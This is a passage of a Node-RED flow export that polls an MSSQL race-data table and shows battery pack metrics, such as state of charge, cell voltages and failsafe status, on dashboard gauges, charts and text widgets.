        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 860,
        "y": 400,
        "wires": [
            []
        ]
    },
    {
        "id": "46a8903856a98bf8",
        "type": "ui_text",
        "z": "c91b7712e66969da",
        "group": "9f715c58ec97d4b1",
        "order": 4,
        "width": "6",
        "height": "6",
        "name": "",
        "label": "High Cell Resistance ID",
        "format": "{{msg.payload}}",
        "layout": "col-center",
        "className": "",
        "x": 850,
        "y": 440,
        "wires": []
    },
    {
        "id": "605f6de5fe092e0c",
        "type": "function",
        "z": "c91b7712e66969da",
        "name": "dtc status #2 interpreter",
        "func": "return msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 850,
        "y": 520,
        "wires": [
            [
                "5d0afbcc6bb0452f"
            ]
        ]
    },
    {
        "id": "39bd307837c22326",
        "type": "function",
        "z": "c91b7712e66969da",
        "name": "dtc status #1 interpreter",
        "func": "return msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 850,
        "y": 480,
        "wires": [
            [
                "72dc64a3ce9a264d"
            ]
        ]
    },
    {
        "id": "72dc64a3ce9a264d",
        "type": "ui_text",
        "z": "c91b7712e66969da",
        "group": "9f715c58ec97d4b1",
        "order": 10,
        "width": "6",
        "height": "6",
        "name": "",
        "label": "DTC status #1",
        "format": "{{msg.payload}}",
        "layout": "col-center",
        "className": "",
        "x": 1100,
        "y": 480,
        "wires": []
    },
    {
        "id": "5d0afbcc6bb0452f",
        "type": "ui_text",
        "z": "c91b7712e66969da",
        "group": "9f715c58ec97d4b1",
        "order": 2,
        "width": "6",
        "height": "6",
        "name": "",
        "label": "DTC Status #2",
        "format": "{{msg.payload}}",
        "layout": "col-center",
        "className": "",
        "x": 1100,
        "y": 520,
        "wires": []
    },
    {
        "id": "0b16929d7a64ef72",
        "type": "inject",
        "z": "594e9fd18f91cc50",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "1",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 330,
        "y": 260,
        "wires": [
            [
                "275cd9d52450ab82"
            ]
        ]
    },
    {
        "id": "275cd9d52450ab82",
        "type": "MSSQL",
        "z": "594e9fd18f91cc50",
        "mssqlCN": "933ce03686fddbab",
        "name": "",
        "outField": "payload",
        "returnType": 0,
        "throwErrors": 1,
        "query": "SELECT TOP 1 *\nFROM dbo.race_data\nORDER BY entry_num DESC;",
        "modeOpt": "queryMode",
        "modeOptType": "query",
        "queryOpt": "payload",
        "queryOptType": "editor",
        "paramsOpt": "queryParams",
        "paramsOptType": "none",
        "rows": "rows",
        "rowsType": "msg",
        "parseMustache": true,
        "params": [],
        "x": 540,
        "y": 260,
        "wires": [
            [
                "fce4f2a6f3872466"
            ]
        ]
    },
    {
        "id": "fce4f2a6f3872466",
        "type": "function",
        "z": "594e9fd18f91cc50",
        "name": "potentially useful messages",
        "func": "var sigFigs = 2\n\nvar pack_soc =\n{\n    topic: \"pack_soc\",\n    payload: msg.payload[0].pack_soc\n}\ntry {\n    pack_soc.payload = pack_soc.payload.toFixed(sigFigs)\n} catch { }\n\nvar pack_state_of_health =\n{\n    topic: \"pack_state_of_health\",\n    payload: msg.payload[0].pack_state_of_health\n}\ntry {\n    pack_state_of_health.payload = pack_state_of_health.payload.toFixed(sigFigs)\n} catch { }\n\nvar pack_summed_voltage =\n{\n    topic: \"pack_summed_voltage\",\n    payload: msg.payload[0].pack_summed_voltage\n}\ntry {\n    pack_summed_voltage.payload = pack_summed_voltage.payload.toFixed(sigFigs)\n} catch { }\n\nvar adaptive_total_capacity =\n{\n    topic: \"adaptive_total_capacity\",\n    payload: msg.payload[0].adaptive_total_capacity\n}\ntry {\n    adaptive_total_capacity.payload = adaptive_total_capacity.payload.toFixed(sigFigs)\n} catch { }\n\nvar adaptive_amp_hours =\n{\n    topic: \"adaptive_amp_hours\",\n    payload: msg.payload[0].adaptive_amp_hours\n}\ntry {\n    adaptive_amp_hours.payload = adaptive_amp_hours.payload.toFixed(sigFigs)\n} catch { }\n\nvar adaptive_state_of_charge =\n{\n    topic: \"adaptive_state_of_charge\",\n    payload: msg.payload[0].adaptive_state_of_charge\n}\ntry {\n    adaptive_state_of_charge.payload = adaptive_state_of_charge.payload.toFixed(sigFigs)\n} catch { }\n\nvar failsafe_statuses =\n{\n    topic: \"failsafe_statuses\",\n    payload: msg.payload[0].failsafe_statuses\n}\n/* try {\n    failsafe_statuses.payload = failsafe_statuses.payload.toFixed(sigFigs)\n} catch { } */\n\nvar rolling_counter =\n{\n    topic: \"rolling_counter\",\n    payload: msg.payload[0].rolling_counter\n}\ntry {\n    rolling_counter.payload = rolling_counter.payload.toFixed(sigFigs)\n} catch { }\n\nvar total_pack_adc =\n{\n    topic: \"total_pack_adc\",\n    payload: msg.payload[0].total_pack_adc\n}\ntry {\n    total_pack_adc.payload = total_pack_adc.payload.toFixed(sigFigs)\n} catch { }\n\nvar low_cell_voltage =\n{\n    topic: \"low_cell_voltage\",\n    payload: msg.payload[0].low_cell_voltage\n}\ntry {\n    low_cell_voltage.payload = low_cell_voltage.payload.toFixed(sigFigs)\n} catch { }\n\nvar low_cell_open_voltage_id =\n{\n    topic: \"low_cell_open_voltage_id\",\n    payload: msg.payload[0].low_cell_open_voltage_id\n}\ntry {\n    low_cell_open_voltage_id.payload = low_cell_open_voltage_id.payload.toFixed(sigFigs)\n} catch { }\n\nvar high_cell_open_voltage =\n{\n    topic: \"high_cell_open_voltage\",\n    payload: msg.payload[0].high_cell_open_voltage\n}\ntry {\n    high_cell_open_voltage.payload = high_cell_open_voltage.payload.toFixed(sigFigs)\n} catch { }\n\nvar high_cell_open_voltage_id =\n{\n    topic: \"high_cell_open_voltage_id\",\n    payload: msg.payload[0].high_cell_open_voltage_id\n}\ntry {\n    high_cell_open_voltage_id.payload = high_cell_open_voltage_id.payload.toFixed(sigFigs)\n} catch { }\n\nvar average_cell_open_voltage =\n{\n    topic: \"average_cell_open_voltage\",\n    payload: msg.payload[0].average_cell_open_voltage\n}\ntry {\n    average_cell_open_voltage.payload = average_cell_open_voltage.payload.toFixed(sigFigs)\n} catch { }\n\nreturn [\n    pack_soc,\n    pack_state_of_health,\n    pack_summed_voltage,\n    adaptive_total_capacity,\n    adaptive_amp_hours,\n    adaptive_state_of_charge,\n    failsafe_statuses,\n    rolling_counter,\n    total_pack_adc,\n    low_cell_voltage,\n    low_cell_open_voltage_id,\n    high_cell_open_voltage,\n    high_cell_open_voltage_id,\n    average_cell_open_voltage\n];\n",
        "outputs": 14,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 800,
        "y": 260,
        "wires": [
            [
                "6cae2349bbe224bf"
            ],
            [
                "d7a4e4283792083b"
            ],
            [
                "1355f066678b78da"
            ],
            [
                "461a17a2e944d6fe"
            ],
            [
                "a7e47b2385653e58"
            ],
            [
                "6c2745fe442397c9"
            ],
            [
                "19ebdd6de4e7ec22"
            ],
            [
                "faf4259f29f4989a"
            ],
            [
                "a063d9a10e3f65a6"
            ],
            [
                "30e16296e8c67c55"
            ],
            [
                "1042301885d9fe1d"
            ],
            [
                "78da8df175f75d03"
            ],
            [
                "159b9ce9eee465f6"
            ],
            [
                "4a0de4b619a5b63c"
            ]
        ]
    },
    {
        "id": "6cae2349bbe224bf",
        "type": "ui_gauge",
        "z": "594e9fd18f91cc50",
        "name": "",
        "group": "b5264e960f9eb7eb",
        "order": 0,
        "width": "6",
        "height": "6",
        "gtype": "gage",
        "title": "Pack Depth of Discharge",
        "label": "Percentage",
        "format": "{{value | number:2}}%",
        "min": 0,
        "max": "100",
        "colors": [
            "#00b500",
            "#e6e600",
            "#ca3838"
        ],
        "seg1": "",
        "seg2": "",
        "diff": false,
        "className": "",
        "x": 1130,
        "y": 160,
        "wires": []
    },
    {
        "id": "d7a4e4283792083b",
        "type": "ui_gauge",
        "z": "594e9fd18f91cc50",
        "name": "",
        "group": "b5264e960f9eb7eb",
        "order": 0,
        "width": "6",
        "height": "6",
        "gtype": "gage",
        "title": "Pack State of Health",
        "label": "Percentage",
        "format": "{{value | number:2}}%",
        "min": 0,
        "max": "100",
        "colors": [
            "#00b500",
            "#e6e600",
            "#ca3838"
        ],
        "seg1": "",
        "seg2": "",
        "diff": false,
        "className": "",
        "x": 1120,
        "y": 200,
        "wires": []
    },
    {
        "id": "1355f066678b78da",
        "type": "ui_chart",
        "z": "594e9fd18f91cc50",
        "name": "",
        "group": "b5264e960f9eb7eb",
        "order": 2,
        "width": "6",
        "height": "6",
        "label": "Pack Summed Voltage",
        "chartType": "line",
        "legend": "false",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "",
        "ymax": "",
        "removeOlder": 1,
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 1120,
        "y": 240,
        "wires": [
            []
        ]
    },
    {
        "id": "461a17a2e944d6fe",
        "type": "ui_text",
        "z": "594e9fd18f91cc50",
        "group": "b5264e960f9eb7eb",
        "order": 3,
        "width": "6",
        "height": "6",
        "name": "",
        "label": "Adaptive Total Capacity",
        "format": "{{msg.payload}}",
        "layout": "col-center",
        "className": "",
        "x": 1130,
        "y": 280,
        "wires": []
    },
    {
        "id": "a7e47b2385653e58",
        "type": "ui_chart",
        "z": "594e9fd18f91cc50",
        "name": "",
        "group": "b5264e960f9eb7eb",
        "order": 4,
        "width": "6",
        "height": "6",
        "label": "Adaptive Amp Hours",
        "chartType": "line",
        "legend": "false",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "",
        "ymax": "",
        "removeOlder": 1,
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 1120,
        "y": 320,
        "wires": [
            []
        ]
    },
    {
        "id": "6c2745fe442397c9",
        "type": "ui_gauge",
        "z": "594e9fd18f91cc50",
        "name": "",
        "group": "b5264e960f9eb7eb",
        "order": 0,
        "width": "6",
        "height": "6",
        "gtype": "gage",
        "title": "Adaptive State of Charge",
        "label": "Percentage",
        "format": "{{value | number:2}}%",
        "min": 0,
        "max": "100",
        "colors": [
            "#00b500",
            "#e6e600",
            "#ca3838"
        ],
        "seg1": "",
        "seg2": "",
        "diff": false,
        "className": "",
        "x": 1130,
        "y": 360,
        "wires": []
    },
    {
        "id": "19ebdd6de4e7ec22",
        "type": "function",
        "z": "594e9fd18f91cc50",
        "name": "failsafe status interpreter",
        "func": "return msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 1130,
        "y": 400,
        "wires": [
            [
                "4ec3ba31add2e0e4"
            ]
        ]
    },
    {
        "id": "faf4259f29f4989a",
        "type": "ui_chart",
        "z": "594e9fd18f91cc50",
        "name": "",
        "group": "b5264e960f9eb7eb",
        "order": 7,
        "width": "6",
        "height": "6",
        "label": "Rolling Counter",
        "chartType": "line",
        "legend": "false",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "0",
        "ymax": "255",
        "removeOlder": 1,
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 1100,
        "y": 440,
        "wires": [
            []
        ]
    },
    {
        "id": "a063d9a10e3f65a6",
        "type": "ui_chart",
        "z": "594e9fd18f91cc50",
        "name": "",
        "group": "b5264e960f9eb7eb",
        "order": 7,
        "width": "6",
        "height": "6",
        "label": "Total Pack ADC",
        "chartType": "line",
        "legend": "false",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "",
        "ymax": "",
        "removeOlder": 1,
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 1100,
        "y": 480,
        "wires": [
            []
        ]
    },
    {
        "id": "30e16296e8c67c55",
        "type": "ui_chart",
        "z": "594e9fd18f91cc50",
        "name": "",
        "group": "b5264e960f9eb7eb",
        "order": 8,
        "width": "6",
        "height": "6",
        "label": "Low Cell Open Voltage",
        "chartType": "line",
        "legend": "false",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "",
        "ymax": "",
        "removeOlder": 1,
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 1120,
        "y": 520,
        "wires": [
            []
        ]
    },
    {
        "id": "1042301885d9fe1d",
        "type": "ui_text",
        "z": "594e9fd18f91cc50",
        "group": "b5264e960f9eb7eb",
        "order": 9,
        "width": "6",
        "height": "6",
        "name": "",
        "label": "Low Cell Open Voltage ID",
        "format": "{{msg.payload}}",
        "layout": "col-center",
        "className": "",
        "x": 1130,
        "y": 560,
        "wires": []
    },
    {
        "id": "78da8df175f75d03",
        "type": "ui_chart",
        "z": "594e9fd18f91cc50",
        "name": "",
        "group": "b5264e960f9eb7eb",
        "order": 8,
        "width": "6",
        "height": "6",
        "label": "High Cell Open Voltage",
        "chartType": "line",
        "legend": "false",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "",
        "ymax": "",
        "removeOlder": 1,
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 1130,
        "y": 600,
        "wires": [
            []
        ]
    },
    {
        "id": "159b9ce9eee465f6",
        "type": "ui_text",
        "z": "594e9fd18f91cc50",
        "group": "b5264e960f9eb7eb",
        "order": 9,
        "width": "6",
        "height": "6",
        "name": "",
        "label": "High Cell Open Voltage ID",
        "format": "{{msg.payload}}",
        "layout": "col-center",
        "className": "",
        "x": 1130,
        "y": 640,
        "wires": []
    },
    {
        "id": "4a0de4b619a5b63c",
        "type": "ui_chart",
        "z": "594e9fd18f91cc50",
        "name": "",
        "group": "b5264e960f9eb7eb",
        "order": 8,
        "width": "6",
        "height": "6",
        "label": "Average Cell Open Voltage",
        "chartType": "line",
        "legend": "false",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "",
        "ymax": "",
        "removeOlder": 1,
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 1140,
        "y": 680,
        "wires": [
            []
        ]
    },
    {
        "id": "4ec3ba31add2e0e4",
        "type": "ui_text",
        "z": "594e9fd18f91cc50",
        "group": "b5264e960f9eb7eb",
        "order": 13,
        "width": "6",
        "height": "6",
        "name": "",
        "label": "Failsafe status",
        "format": "{{msg.payload}}",
        "layout": "col-center",
        "className": "",
        "x": 1380,
        "y": 400,
        "wires": []
    }
]
